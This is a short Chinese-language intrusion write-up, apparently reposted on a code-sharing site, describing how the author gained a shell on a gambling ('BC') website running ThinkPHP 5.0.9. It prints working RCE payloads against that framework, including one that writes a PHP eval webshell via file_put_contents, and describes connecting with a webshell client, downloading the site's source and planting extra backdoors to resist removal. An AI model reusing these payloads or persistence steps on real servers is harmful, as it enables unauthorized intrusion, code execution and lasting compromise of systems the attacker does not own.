簡單的BC站點getshell


0x01 確定目標

主站:

旁站:

0x02 漏洞利用

通過信息收集發現是個tp v5.0.9,此版本存在tp-rce漏洞。

直接通過payload進行測試,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

發現是php 5.4.45版本的,

直接嘗試getshell:

發現system被禁用,嘗試其他系統命令的也一樣。

查看phpinfo中desable_functions禁用了那些函數。

想辦法怎么繞過進行寫馬(此處卡了我半天)
最后通過一位滲透小伙伴,想出下面的可以利用file_put_contents直接寫shell,想了半天,忘了用其他函數進行直接寫馬就可以了,並不需要非得利用system命令進行寫馬,還是底層知識薄弱啊。再次感謝小伙伴!

0x03 getshell

構造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

寫入成功,利用菜刀連接。

成功連接。
查看權限:

發現啟動了遠程安全模式。
想要繞過,發現很多函數被禁用,占未成功。
下載源碼:

多部署一些后門,防止被刪。

0x04 總結

1.打開BC網站,通過底部版本信息,發現該站點框架是tp v5.0.9,存在RCE漏洞

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

2.發現是php 5.4.45版本的,直接嘗試執行命令,發現system函數以及執行系統命令的函數也被禁用。

Post:_method=__construct&filter[]=assert&method=get&get[]=whomai

3.雖然禁用系統命令函數,可利用file_put_contents直接寫shell繞過

4.獲得getshell

構造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

5.寫入成功,利用菜刀連接




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM